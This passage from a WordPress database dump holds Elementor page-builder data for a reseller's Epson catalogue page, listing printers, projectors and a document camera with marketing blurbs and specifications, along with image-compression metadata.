PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson AcuLaser C9300N<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p>Epson EB-1785W\\u00a0<\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-536Wi\\u00a0<img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson 595Wi\\/585Wi\\/575Wi\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-L1405UNL\\u00a0<img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-G7400UNL\\u00a0<img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-Z10000U\\u00a0<img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p>Document Camera ELPDC21\\u00a0<img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(4002,2759,'_elementor_version','0.4'),(4033,2732,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.98372916704122559394818381406366825103759765625;s:5:\"bytes\";i:5544;s:11:\"size_before\";i:111242;s:10:\"size_after\";i:105698;s:4:\"time\";d:0.520000000000000017763568394002504646778106689453125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.2599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:262;s:11:\"size_before\";i:11607;s:10:\"size_after\";i:11345;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.3300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:725;s:11:\"size_before\";i:31141;s:10:\"size_after\";i:30416;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1048;s:11:\"size_before\";i:20590;s:10:\"size_after\";i:19542;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.3300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:3509;s:11:\"size_before\";i:47904;s:10:\"size_after\";i:44395;s:4:\"time\";d:0.25;}}}'),(4005,2760,'_wp_page_template','template-fullwidth.php'),(4006,2760,'_elementor_edit_mode','builder'),(4007,2760,'_elementor_template_type','post');
INSERT INTO `wpdp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (4008,2760,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h3>Printers for Work<\\/h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even 